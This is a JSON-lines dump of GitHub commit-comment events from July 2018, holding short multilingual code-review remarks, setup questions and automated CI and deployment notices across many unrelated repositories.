{"id":"7977028431","type":"CommitCommentEvent","actor":{"login":"seabornlee"},"repo":{"name":"wangyongst/mars-rover"},"payload":{"comment":{"id":29735438,"position":38,"line":38,"path":"src/main/java/com/myweb/Rover.java","commit_id":"882e37bda7638cabfb1878bfc7e3a04eb2c2e7a2","created_at":"2018-07-17T14:19:15Z","updated_at":"2018-07-17T14:19:15Z","author_association":"NONE","body":"重复。"}},"created_at":"2018-07-17T14:19:15Z"}
{"id":"7977030588","type":"CommitCommentEvent","actor":{"login":"alecgorge"},"repo":{"name":"RelistenNet/relisten-sonos"},"payload":{"comment":{"id":29735443,"position":10,"line":19,"path":"src/logger.js","commit_id":"47c9cc0f9a06d847cb142a8bddb4f7073877e5d0","created_at":"2018-07-17T14:19:34Z","updated_at":"2018-07-17T14:19:34Z","author_association":"MEMBER","body":"sure, i was just lazy and didn't want to have to modify every file that logs haha"}},"created_at":"2018-07-17T14:19:34Z"}
{"id":"7977032235","type":"CommitCommentEvent","actor":{"login":"mardi08"},"repo":{"name":"PurdueCAM2Project/CAM2WebUI"},"payload":{"comment":{"id":29735447,"position":null,"line":null,"path":null,"commit_id":"7f3d726307f4c7f898b482bb3277183af0c3536b","created_at":"2018-07-17T14:19:49Z","updated_at":"2018-07-17T14:19:49Z","author_association":"COLLABORATOR","body":"@rg167 Good job!"}},"created_at":"2018-07-17T14:19:49Z"}
{"id":"7977044390","type":"CommitCommentEvent","actor":{"login":"sblack-usu"},"repo":{"name":"hydroshare/hydroshare"},"payload":{"comment":{"id":29735472,"position":null,"line":null,"path":null,"commit_id":"074f93cd8c698a1b176bf1f80ecc81b18e68f1db","created_at":"2018-07-17T14:21:37Z","updated_at":"2018-07-17T14:21:37Z","author_association":"CONTRIBUTOR","body":"Couldn't we avoid most of these changes if we just link files that are in the newly unzipped folder, instead of the parent directory?  Something like this?\r\n\r\n```\r\nlink_irods_folder_to_django(resource, istorage, os.path.join(unzip_path, zip_fname))\r\n```"}},"created_at":"2018-07-17T14:21:37Z"}
{"id":"7977046758","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"JerikoQ/RoR"},"payload":{"comment":{"id":29735475,"position":5,"line":5,"path":"Lession1/2.rb","commit_id":"7735fe369b63583167a2691d37b5e2972a560462","created_at":"2018-07-17T14:21:59Z","updated_at":"2018-07-17T14:21:59Z","author_association":"NONE","body":"здесь и далее везде:\r\nрекомендуется давать переменным \"говорящие\" имена, чтобы впоследствии было проще читать и понимать код\r\nк примеру данную переменную можно было бы назвать `base`"}},"created_at":"2018-07-17T14:21:59Z"}
{"id":"7977047743","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"JerikoQ/RoR"},"payload":{"comment":{"id":29735477,"position":5,"line":5,"path":"Lession1/2.rb","commit_id":"7735fe369b63583167a2691d37b5e2972a560462","created_at":"2018-07-17T14:22:09Z","updated_at":"2018-07-17T14:22:09Z","author_association":"NONE","body":"использование однобуквенных переменных может быть оправданно разве что в случаях, когда эти навзвания диктует контекст задачи\r\nк примеру, если это коэффициэнты уравнения, произвольные стороны геометрической фигуры и т.п."}},"created_at":"2018-07-17T14:22:09Z"}
{"id":"7977050261","type":"CommitCommentEvent","actor":{"login":"McAfeeAdminInstance2"},"repo":{"name":"McAfeeInst2Org1/newrepo"},"payload":{"comment":{"id":29735480,"position":1,"line":null,"path":"1531837347.87/github_test.txt","commit_id":"e14b4e1e1894285e11fecfbba24acbe613879635","created_at":"2018-07-17T14:22:30Z","updated_at":"2018-07-17T14:22:30Z","author_association":"CONTRIBUTOR","body":"889976543"}},"created_at":"2018-07-17T14:22:30Z"}
{"id":"7977053572","type":"CommitCommentEvent","actor":{"login":"miaoyuxinbaby"},"repo":{"name":"HcySunYang/vue-design"},"payload":{"comment":{"id":29735486,"position":null,"line":null,"path":null,"commit_id":"e98603bdfeb5191b21c4a629d33c991ee163a625","created_at":"2018-07-17T14:22:59Z","updated_at":"2018-07-17T14:22:59Z","author_association":"COLLABORATOR","body":"额， 提交代码的时候用的工作时的帐号。名字暴露了，有点方"}},"created_at":"2018-07-17T14:22:59Z"}
{"id":"7977063321","type":"CommitCommentEvent","actor":{"login":"kenjoywms"},"repo":{"name":"kenjoywms/portfolio"},"payload":{"comment":{"id":29735513,"position":13,"line":13,"path":"_Grades.txt","commit_id":"23927aeae85b82fce6331892e95836056aa49347","created_at":"2018-07-17T14:24:22Z","updated_at":"2018-07-17T14:24:22Z","author_association":"OWNER","body":"I think I need more guidance with this "}},"created_at":"2018-07-17T14:24:22Z"}
{"id":"7977068707","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"JerikoQ/RoR"},"payload":{"comment":{"id":29735529,"position":36,"line":36,"path":"Lession1/3.rb","commit_id":"7735fe369b63583167a2691d37b5e2972a560462","created_at":"2018-07-17T14:25:10Z","updated_at":"2018-07-17T14:25:10Z","author_association":"NONE","body":"программа пока работает некорректно\r\nвот смотри:\r\n```\r\n$ ruby 3.rb \r\nВведите сторону a\r\n5\r\nВведите сторону b\r\n4\r\nВведите сторону c\r\n3\r\nТреугольник не прямоугольный\r\n```\r\nпри этом стороны 3, 4, 5 - это стороны прямоугольного треугольника"}},"created_at":"2018-07-17T14:25:10Z"}
{"id":"7977069253","type":"CommitCommentEvent","actor":{"login":"furqanbaqai"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29735533,"position":46,"line":87,"path":"contracts/Remittance.sol","commit_id":"f4f2f3b5de8261cfe0b443f414c7e7b37055aae8","created_at":"2018-07-17T14:25:14Z","updated_at":"2018-07-17T14:25:14Z","author_association":"OWNER","body":"Pay ID is like payment ID OR voucher number which is used to make combination of otpx and receiver unique. The assumption behind payID is that otpx can repeat, as in `OTP1 = 7749` and `OTP2 =  5912` can get regenerated, for the same receiver, but when combined with a payment id (generated off-chain), the hash can become unique. We usually use identifier like FT numbers or Reference ID numbers to seed financial transactions. Plus using this strategy, we can co-relate the transaction with our financial systems as well. Appreciate your comments..."}},"created_at":"2018-07-17T14:25:14Z"}
{"id":"7977073114","type":"CommitCommentEvent","actor":{"login":"kenjoywms"},"repo":{"name":"kenjoywms/portfolio"},"payload":{"comment":{"id":29735544,"position":17,"line":17,"path":"_Grades.txt","commit_id":"23927aeae85b82fce6331892e95836056aa49347","created_at":"2018-07-17T14:25:46Z","updated_at":"2018-07-17T14:25:46Z","author_association":"OWNER","body":"I think I need help trying to understand the CSS rules and things. "}},"created_at":"2018-07-17T14:25:46Z"}
{"id":"7977099309","type":"CommitCommentEvent","actor":{"login":"yesmeck"},"repo":{"name":"ant-design/ant-design"},"payload":{"comment":{"id":29735604,"position":null,"line":null,"path":null,"commit_id":"c696757793fabd9b108229cef3f831eb0108e456","created_at":"2018-07-17T14:29:32Z","updated_at":"2018-07-17T14:29:32Z","author_association":"MEMBER","body":"Follow e6c4c6667d25f5ef5dbf6dfce1b08804ec0ed5cb"}},"created_at":"2018-07-17T14:29:32Z"}
{"id":"7977100647","type":"CommitCommentEvent","actor":{"login":"ben519"},"repo":{"name":"tidyverse/ggplot2"},"payload":{"comment":{"id":29735607,"position":null,"line":null,"path":null,"commit_id":"3fc9309a757a67517c262151dfb13363214f1112","created_at":"2018-07-17T14:29:43Z","updated_at":"2018-07-17T14:29:43Z","author_association":"NONE","body":"I think you can drop the `all()` since you're using `&&`.  So it'd be `if (!\"x\" %in% names(data) && c(\"xmin\", \"xmax\") %in% names(data))` ..."}},"created_at":"2018-07-17T14:29:43Z"}
{"id":"7977105133","type":"CommitCommentEvent","actor":{"login":"sp193"},"repo":{"name":"ps2dev/ps2toolchain"},"payload":{"comment":{"id":29735622,"position":null,"line":null,"path":null,"commit_id":"68a062035c5862e8ad6f8434418496fa93d93992","created_at":"2018-07-17T14:30:17Z","updated_at":"2018-07-17T14:30:17Z","author_association":"MEMBER","body":"This commit fixes a glitch that was introduced in 637ccef, where the CPPFLAGS part was accidentally removed."}},"created_at":"2018-07-17T14:30:17Z"}
{"id":"7977107036","type":"CommitCommentEvent","actor":{"login":"dankellymn"},"repo":{"name":"intendia-oss/autorest"},"payload":{"comment":{"id":29735626,"position":5,"line":53,"path":"core/src/main/java/com/intendia/gwt/autorest/client/CollectorResourceVisitor.java","commit_id":"1e06d2fbd78fd83d6576c403288f1caa6964f29f","created_at":"2018-07-17T14:30:28Z","updated_at":"2018-07-17T14:30:28Z","author_association":"NONE","body":"Yeah, it seems to be a disconnect between older javarx vs newer swagger/openApi with what they feel paths should mean..."}},"created_at":"2018-07-17T14:30:28Z"}
{"id":"7977117241","type":"CommitCommentEvent","actor":{"login":"heri3295"},"repo":{"name":"heri3295/Harry-SPS-CUNY-Project0"},"payload":{"comment":{"id":29735652,"position":null,"line":null,"path":null,"commit_id":"36ed5d18e3080aa69175e97a2630c4bfb05ebe16","created_at":"2018-07-17T14:31:52Z","updated_at":"2018-07-17T14:31:52Z","author_association":"OWNER","body":"Uploaded to the PalindromeCheckerClass branch my PalindromeCheckerApp. The actual code can be found under the .cs files. \r\n\r\nIn order to use the application it should be a simple run of the PalindromeCheckerMain file, which has the main(). The testing methods are being called in the main. Everything within the PalindromeCheckerClass is static, so there is no need to create an instance of that class. \r\n\r\nThe ClassLibrary1 file includes the file PalindromeCheckerClass.cs, which is the actual class. The UnitTestProject1 file includes the file UnitTestPalindromeChecker.cs, which is the testing methods. The main is within the PalindromeCheckerMain.cs file, which is located under the PalindromeCheckerApp file. Load the PalindromeCheckerApp.sln into Visual Studio to open up the whole project. \r\n\r\nThe logic behind my program is to have two indexers within one for-loop. One is going in reverse, one is proceeding forward. Because I handle it by index, and not by actual character, my program cannot handle spaces within a palindrome."}},"created_at":"2018-07-17T14:31:52Z"}
{"id":"7977117394","type":"CommitCommentEvent","actor":{"login":"Hains"},"repo":{"name":"PLi-metas/meta-dream"},"payload":{"comment":{"id":29735653,"position":null,"line":null,"path":null,"commit_id":"868e864833603bec38967baf4c6c473becdb77b9","created_at":"2018-07-17T14:31:53Z","updated_at":"2018-07-17T14:31:53Z","author_association":"MEMBER","body":"There's no dm7020hdv2 file when built with MACHINE=dm7020hdv2 make image.\r\nMakefile patched and backup Makefile present.\r\nThe variable DMTYPE never reaches meta-dream.\r\nThat's for sure.\r\nSo probably the code in dm7020hdv2.conf won't work as well (always false).\r\nBut we'll make test image."}},"created_at":"2018-07-17T14:31:53Z"}
{"id":"7977128232","type":"CommitCommentEvent","actor":{"login":"chih-hong"},"repo":{"name":"zjuchenlong/sca-cnn"},"payload":{"comment":{"id":29735680,"position":null,"line":null,"path":null,"commit_id":"1675c5fc99318921aa836345e8db56426f25c1f5","created_at":"2018-07-17T14:33:31Z","updated_at":"2018-07-17T14:33:31Z","author_association":"NONE","body":"Hello, I have some question for run this code.\r\nRequirement.txt, Theano, Python, ...version. Because I have some error with running code.\r\nDataset and evaluation metric I don't know whether correct.\r\nthanks."}},"created_at":"2018-07-17T14:33:31Z"}
{"id":"7977129155","type":"CommitCommentEvent","actor":{"login":"jdegoes"},"repo":{"name":"scalaz/scalaz-zio"},"payload":{"comment":{"id":29735686,"position":9,"line":423,"path":"core/jvm/src/main/scala/scalaz/zio/RTS.scala","commit_id":"a904737f6a869aa26a42f75e3403155ae479e070","created_at":"2018-07-17T14:33:39Z","updated_at":"2018-07-17T14:33:39Z","author_association":"MEMBER","body":"This doesn't seem correct. What if the finalizers failed, but did not produce any error? We now have that as a possibility because `terminate` and friends don't need errors."}},"created_at":"2018-07-17T14:33:39Z"}
{"id":"7977130911","type":"CommitCommentEvent","actor":{"login":"phuthinhabc"},"repo":{"name":"phuthinhabc/thinhtest2"},"payload":{"comment":{"id":29735689,"position":null,"line":null,"path":null,"commit_id":"fba24aa43efa86d6c489b81d31eb47e165a1ae0b","created_at":"2018-07-17T14:33:56Z","updated_at":"2018-07-17T14:33:56Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-17T14:33:56Z"}
{"id":"7977132288","type":"CommitCommentEvent","actor":{"login":"zilav"},"repo":{"name":"TES5Edit/TES5Edit"},"payload":{"comment":{"id":29735699,"position":5,"line":149,"path":"wbLOD.pas","commit_id":"5c2bd7871e8356c8a3da43b269e9445f5cb27f76","created_at":"2018-07-17T14:34:09Z","updated_at":"2018-07-17T14:34:09Z","author_association":"CONTRIBUTOR","body":"Ah yes, I think I saw Int64 in it when you initially updated for >255 plugins and that stuck into my mind."}},"created_at":"2018-07-17T14:34:09Z"}
{"id":"7977137425","type":"CommitCommentEvent","actor":{"login":"DonghyukJacobJang"},"repo":{"name":"Jam3/AR.js"},"payload":{"comment":{"id":29735712,"position":null,"line":null,"path":null,"commit_id":"25dbcc93ef1e5707ff20a3c445f204418790f915","created_at":"2018-07-17T14:34:56Z","updated_at":"2018-07-17T14:34:56Z","author_association":"NONE","body":"@PeterAltamirano \r\n* Can we work on a separated branch (eg. jam3-updates) which we maintain, not directly master?\r\n     - Yes, of course. I agreed with you.\r\n* Why did we pushed only changed build file, not the source code change?\r\n     - I forgot about this. Definitely will make this change.\r\n* What's the parentId referring to, is it Jam3 specific or would be worth create an official PR?\r\n     - When WebAR is initiated, AR.js adds camera view(`video` tag) under `body`. Ideally, `canvas`, which is WebGL, and `video` should be kept in the same dom node level for maintaining/debugging purpose. AR.js does not provide the option by default. That is why I had to add the prop `parentId`. I was considering creating an official PR, and we can chat about this later. \r\n* Can we create a separated version branch e.g. vx.x.x.1 (where x.x.x is official current version and .1 is a Jam3 update) then we can easily refer to adjusted specific version in the npm.\r\n     - Will make this update."}},"created_at":"2018-07-17T14:34:56Z"}
{"id":"7977144383","type":"CommitCommentEvent","actor":{"login":"jdegoes"},"repo":{"name":"scalaz/scalaz-zio"},"payload":{"comment":{"id":29735729,"position":19,"line":194,"path":"core/jvm/src/test/scala/scalaz/zio/RTSSpec.scala","commit_id":"a904737f6a869aa26a42f75e3403155ae479e070","created_at":"2018-07-17T14:35:57Z","updated_at":"2018-07-17T14:35:57Z","author_association":"MEMBER","body":"So the ordering is: first element in list = first failure, last element in list = last failure."}},"created_at":"2018-07-17T14:35:57Z"}
{"id":"7977146905","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-remittance"},"payload":{"comment":{"id":29735743,"position":4,"line":5,"path":"test/remittance.js","commit_id":"028bd99e70ec883644821a3b8fcd7a0551123935","created_at":"2018-07-17T14:36:18Z","updated_at":"2018-07-17T14:36:18Z","author_association":"NONE","body":"In Ganache you increase time in a blink https://github.com/b9lab/play-with-time/blob/master/test/piggyBank.js#L268"}},"created_at":"2018-07-17T14:36:18Z"}
{"id":"7977150223","type":"CommitCommentEvent","actor":{"login":"zaenalarifin12"},"repo":{"name":"zaenalarifin12/welek"},"payload":{"comment":{"id":29735760,"position":2,"line":2,"path":"README.md","commit_id":"6a6595b79d0dc9a5b8eb0f6c4d40bc6e631343f0","created_at":"2018-07-17T14:36:47Z","updated_at":"2018-07-17T14:36:47Z","author_association":"OWNER","body":"yu"}},"created_at":"2018-07-17T14:36:47Z"}
{"id":"7977150636","type":"CommitCommentEvent","actor":{"login":"pannarale"},"repo":{"name":"gwastro/pycbc"},"payload":{"comment":{"id":29735764,"position":null,"line":null,"path":null,"commit_id":"1b1cc07c7332c6a7315d027af3d88457c5a53b65","created_at":"2018-07-17T14:36:51Z","updated_at":"2018-07-17T14:36:51Z","author_association":"CONTRIBUTOR","body":"Hi @idorrington92, could you also update the arguments, so that null_min, null_grad, null_step replace null_fraction? Thanks."}},"created_at":"2018-07-17T14:36:51Z"}
{"id":"7977153521","type":"CommitCommentEvent","actor":{"login":"mikema2009"},"repo":{"name":"mikema2009/miniature-funicular"},"payload":{"comment":{"id":29735769,"position":72,"line":72,"path":".gitignore","commit_id":"e6993d4f9b1ba272a33ad6353b195487b5a25674","created_at":"2018-07-17T14:37:17Z","updated_at":"2018-07-17T14:37:17Z","author_association":"OWNER","body":"def should_log(func):########################################没看都懂\r\n    def func_with_log(*args, **kwargs):\r\n        print(\"Calling:\", func.__name__)\r\n        return func(*args, **kwargs)\r\n    return func_with_log"}},"created_at":"2018-07-17T14:37:17Z"}
{"id":"7977155149","type":"CommitCommentEvent","actor":{"login":"eFrysTon"},"repo":{"name":"TES5Edit/TES5Edit"},"payload":{"comment":{"id":29735772,"position":5,"line":149,"path":"wbLOD.pas","commit_id":"5c2bd7871e8356c8a3da43b269e9445f5cb27f76","created_at":"2018-07-17T14:37:30Z","updated_at":"2018-07-17T14:37:30Z","author_association":"CONTRIBUTOR","body":"Yeah, that caused problems in other places too that weren't easy to solve.. so instead of continuing with my attempt at supporting >255 modules, I instead leveraged the work I had already done with TwbFormID to support loading ESLs into the FE xxx slots instead, which was actually surprisingly easy once I was on the right path."}},"created_at":"2018-07-17T14:37:30Z"}
{"id":"7977157495","type":"CommitCommentEvent","actor":{"login":"dschwabeS11"},"repo":{"name":"Perlkonig/grav-theme-knowledge-base"},"payload":{"comment":{"id":29735776,"position":null,"line":null,"path":null,"commit_id":"2c3cfc457ffcb077c7cf6ae5b7cef9fe24fbe534","created_at":"2018-07-17T14:37:51Z","updated_at":"2018-07-17T14:37:51Z","author_association":"NONE","body":"Thanks!\r\n\r\nIs it possible to set dependencies in the theme \"package\" so that it does block updates for plugins until confirmed that they are working fine?"}},"created_at":"2018-07-17T14:37:51Z"}
{"id":"7977159208","type":"CommitCommentEvent","actor":{"login":"julien-leclercq"},"repo":{"name":"CaptainFact/captain-fact-frontend"},"payload":{"comment":{"id":29735780,"position":5,"line":5,"path":"config/env/dev.env","commit_id":"a752044d7126ae4ae0217cccb69b3678ed8f146b","created_at":"2018-07-17T14:38:06Z","updated_at":"2018-07-17T14:38:06Z","author_association":"NONE","body":":)"}},"created_at":"2018-07-17T14:38:06Z"}
{"id":"7977161724","type":"CommitCommentEvent","actor":{"login":"wilfort"},"repo":{"name":"wilfort/exercice-php"},"payload":{"comment":{"id":29735784,"position":null,"line":null,"path":null,"commit_id":"e4b5f00bb8394c8c1b67657bef6222b28177a2d9","created_at":"2018-07-17T14:38:29Z","updated_at":"2018-07-17T14:38:29Z","author_association":"OWNER","body":"Exercice PHP :\r\nlundi 16/7/2018 \r\net mardi 17/7/2018"}},"created_at":"2018-07-17T14:38:29Z"}
{"id":"7977161993","type":"CommitCommentEvent","actor":{"login":"scottaohara"},"repo":{"name":"thegreengrass/dewpoint-forecast"},"payload":{"comment":{"id":29735785,"position":1,"line":1,"path":"index.html","commit_id":"5c51044c1d4586fdae90b884a5bd0efc152ab14f","created_at":"2018-07-17T14:38:32Z","updated_at":"2018-07-17T14:38:32Z","author_association":"NONE","body":"was largely expecting this commit to just say \"yes\""}},"created_at":"2018-07-17T14:38:32Z"}
{"id":"7977168214","type":"CommitCommentEvent","actor":{"login":"kurozael"},"repo":{"name":"CloudSixteen/Clockwork"},"payload":{"comment":{"id":29735800,"position":null,"line":null,"path":null,"commit_id":"2b40cc1fcad19c87defb3aa05e4cc4b24e06f42b","created_at":"2018-07-17T14:39:29Z","updated_at":"2018-07-17T14:39:29Z","author_association":"MEMBER","body":"If you're able to move to these calls into the actual Clockwork.player.GiveFlags and Clockwork.player.TakeFlags methods instead of the hooks that'd be okay for now until I can investigate why UpdateCharacterData isn't automatically setting the shareds vars itself.\r\n\r\nAnother thing you could investigate is whether or not \"Player Flags\" which are the global equivalent of Character Flags are ever networked.\r\n\r\nI can merge in any additional pull-requests when that's resolved. I'd simply go ahead and make the setting of the shared vars happen at the end of the GiveFlags/TakeFlags methods because the gamemode hooks may never be called if a plugin returns out a value before it reaches them."}},"created_at":"2018-07-17T14:39:29Z"}
{"id":"7977169875","type":"CommitCommentEvent","actor":{"login":"eFrysTon"},"repo":{"name":"TES5Edit/TES5Edit"},"payload":{"comment":{"id":29735806,"position":42,"line":769,"path":"wbHelpers.pas","commit_id":"5c2bd7871e8356c8a3da43b269e9445f5cb27f76","created_at":"2018-07-17T14:39:43Z","updated_at":"2018-07-17T14:39:43Z","author_association":"CONTRIBUTOR","body":"Just an explanation about this. When running under the debugger, I pretend that the CRC32 of the exe file is always $FFFFFFFF, otherwise the cache can never be used as every time the program gets recompiled, even if the source hasn't changed, it has a different CRC32..."}},"created_at":"2018-07-17T14:39:43Z"}
{"id":"7977171291","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29735814,"position":null,"line":null,"path":null,"commit_id":"b0d68cb99ca276652e97c7f215b0dad6396922af","created_at":"2018-07-17T14:39:56Z","updated_at":"2018-07-17T14:39:56Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [circleci2r](https://circleci2r-static-docs.pantheonsite.io/docs) Multidev environment:\n- [.circleci/config.yml](https://github.com/pantheon-systems/documentation/commit/b0d68cb99ca276652e97c7f215b0dad6396922af/.circleci/config.yml)\n"}},"created_at":"2018-07-17T14:39:56Z"}
{"id":"7977171369","type":"CommitCommentEvent","actor":{"login":"adulyoung"},"repo":{"name":"adulyoung/badblood"},"payload":{"comment":{"id":29735815,"position":1,"line":1,"path":"CNAME","commit_id":"f0a249ec6a5303e1a212b996f428be8788387126","created_at":"2018-07-17T14:39:57Z","updated_at":"2018-07-17T14:39:57Z","author_association":"OWNER","body":"www.badblood.top"}},"created_at":"2018-07-17T14:39:57Z"}
{"id":"7977172953","type":"CommitCommentEvent","actor":{"login":"sr-murthy"},"repo":{"name":"OasisLMF/ZurichWorkshop2018"},"payload":{"comment":{"id":29735818,"position":null,"line":null,"path":null,"commit_id":"897a813cf796a18de1b62a9d12fda89a9ff85cfb","created_at":"2018-07-17T14:40:13Z","updated_at":"2018-07-17T14:40:13Z","author_association":"CONTRIBUTOR","body":"If installing in a virtualenv it would be best to add the `-e` (editable option) when running `pip install` of a Git branch. Maybe that's why it doesn't work."}},"created_at":"2018-07-17T14:40:13Z"}
{"id":"7977173054","type":"CommitCommentEvent","actor":{"login":"rigelk"},"repo":{"name":"YunoHost-Apps/peertube_ynh"},"payload":{"comment":{"id":29735819,"position":null,"line":null,"path":null,"commit_id":"1d63c3fea98aee0d5e61b28fc7db9af14d073e3b","created_at":"2018-07-17T14:40:13Z","updated_at":"2018-07-17T14:40:13Z","author_association":"MEMBER","body":"please use https://github.com/Chocobozzz/PeerTube/commit/aa1c3d929f524f57930f8bb0ae8b07e8b51f9952 instead."}},"created_at":"2018-07-17T14:40:13Z"}
{"id":"7977173794","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29735821,"position":null,"line":null,"path":null,"commit_id":"9ff879811f4c95e4ebf9b965c64288f1d8c62639","created_at":"2018-07-17T14:40:20Z","updated_at":"2018-07-17T14:40:20Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-17T14:40:20Z"}
{"id":"7977177383","type":"CommitCommentEvent","actor":{"login":"Djuliuss"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29735829,"position":79,"line":61,"path":"contracts/Remittance.sol","commit_id":"e572e9501219ab51a52d241092544c6610b6c9ae","created_at":"2018-07-17T14:40:52Z","updated_at":"2018-07-17T14:40:52Z","author_association":"OWNER","body":"Well, I was thinking that it is the exchange who does that by using one of the many websites out there such as https://emn178.github.io/online-tools/keccak_256.html ."}},"created_at":"2018-07-17T14:40:52Z"}
{"id":"7977182059","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29735840,"position":null,"line":null,"path":null,"commit_id":"91de98cd62e6756a2b574fec0f19d28d56cd71d5","created_at":"2018-07-17T14:41:32Z","updated_at":"2018-07-17T14:41:32Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-17T14:41:32Z"}
{"id":"7977188719","type":"CommitCommentEvent","actor":{"login":"afc163"},"repo":{"name":"ant-design/ant-design"},"payload":{"comment":{"id":29735858,"position":null,"line":null,"path":null,"commit_id":"e6c4c6667d25f5ef5dbf6dfce1b08804ec0ed5cb","created_at":"2018-07-17T14:42:29Z","updated_at":"2018-07-17T14:42:29Z","author_association":"MEMBER","body":"那 antd 就发个 patch 吧。"}},"created_at":"2018-07-17T14:42:29Z"}
{"id":"7977197620","type":"CommitCommentEvent","actor":{"login":"lefty01"},"repo":{"name":"per1234/AH_28BYJ48"},"payload":{"comment":{"id":29735882,"position":null,"line":null,"path":null,"commit_id":"da06faadc4ccfe509ec9e18f5da4de88c39eca83","created_at":"2018-07-17T14:43:47Z","updated_at":"2018-07-17T14:43:47Z","author_association":"NONE","body":"now I tried it ... looks two tabs are ok as well ;) ... then it looks nice.\r\nbtw. I figured the class name is incorrect and wasn't highlighted as well, see: https://github.com/lefty01/AH_28BYJ48/commit/413b638e9c74d63f879f665047e195722b432242"}},"created_at":"2018-07-17T14:43:47Z"}
{"id":"7977198785","type":"CommitCommentEvent","actor":{"login":"sr-murthy"},"repo":{"name":"OasisLMF/ZurichWorkshop2018"},"payload":{"comment":{"id":29735885,"position":null,"line":null,"path":null,"commit_id":"5308dec1db0d6e91287a792e7fd94310fe2fd3db","created_at":"2018-07-17T14:43:57Z","updated_at":"2018-07-17T14:43:57Z","author_association":"CONTRIBUTOR","body":"@zxytan As per my recent comment I think you should leave the `-e` flag next to the Git URL - this will instruct `pip` to install the branch source inside the `src` subdirectory of the virtual environment. Without the `-e` it may install it in the current working directory, which could be anywhere relative to the location of the virtual env."}},"created_at":"2018-07-17T14:43:57Z"}
{"id":"7977203760","type":"CommitCommentEvent","actor":{"login":"Doe-Jon"},"repo":{"name":"minglich/logitech-pubg"},"payload":{"comment":{"id":29735904,"position":null,"line":null,"path":null,"commit_id":"8ed6f4f02965f2e555303811ad28d14b047f52d4","created_at":"2018-07-17T14:44:40Z","updated_at":"2018-07-17T14:44:40Z","author_association":"NONE","body":"How much does sensitivity affect these settings? I am around 29 for most scoping settings.\r\n\r\nThanks for your hard work."}},"created_at":"2018-07-17T14:44:40Z"}
{"id":"7977204583","type":"CommitCommentEvent","actor":{"login":"HoeenCoder"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":29735909,"position":null,"line":null,"path":null,"commit_id":"318db05cc98db041796ace70ddfce72b75429ee3","created_at":"2018-07-17T14:44:48Z","updated_at":"2018-07-17T14:44:48Z","author_association":"COLLABORATOR","body":"Dosen't the input log contain sensitive info (exact teams, ect)? I'd think so considering what its used for, and I also assume this info wont be publicly accessible because of that."}},"created_at":"2018-07-17T14:44:48Z"}
{"id":"7977213331","type":"CommitCommentEvent","actor":{"login":"godo13405"},"repo":{"name":"godo13405/dragon-spellbook"},"payload":{"comment":{"id":29735927,"position":null,"line":null,"path":null,"commit_id":"c036ce91f1d5b0daa0e97572f14b06a59750b936","created_at":"2018-07-17T14:46:05Z","updated_at":"2018-07-17T14:46:05Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/48c4c854-767b-47f7-b2ec-7f79e14cf35d?env_id=ibm%3Ayp%3Aeu-gb \"dragon-book\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/7ddab936-a781-49fa-99fc-742d790aea96?env_id=ibm%3Ayp%3Aeu-gb \"dragon-book\") deployed [dragon-spellbook](https://github.com/godo13405/dragon-spellbook/releases/tag/deploy-ibm-yp-eu-gb-UXCalibur-prod-20180717-144603 \"deploy-ibm-yp-eu-gb-UXCalibur-prod-20180717-144603\") to [prod](https://console.bluemix.net/apps/aaffb021-5482-4ff5-bc14-26c90db6686c?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:UXCalibur:prod\"), including this commit"}},"created_at":"2018-07-17T14:46:05Z"}
{"id":"7977213384","type":"CommitCommentEvent","actor":{"login":"itsmylife44"},"repo":{"name":"sammy007/open-ethereum-pool"},"payload":{"comment":{"id":29735928,"position":null,"line":null,"path":null,"commit_id":"20a3135a78fbe501988264cdab14d0eaae7e7ed6","created_at":"2018-07-17T14:46:05Z","updated_at":"2018-07-17T14:46:05Z","author_association":"NONE","body":"If It working ? "}},"created_at":"2018-07-17T14:46:05Z"}
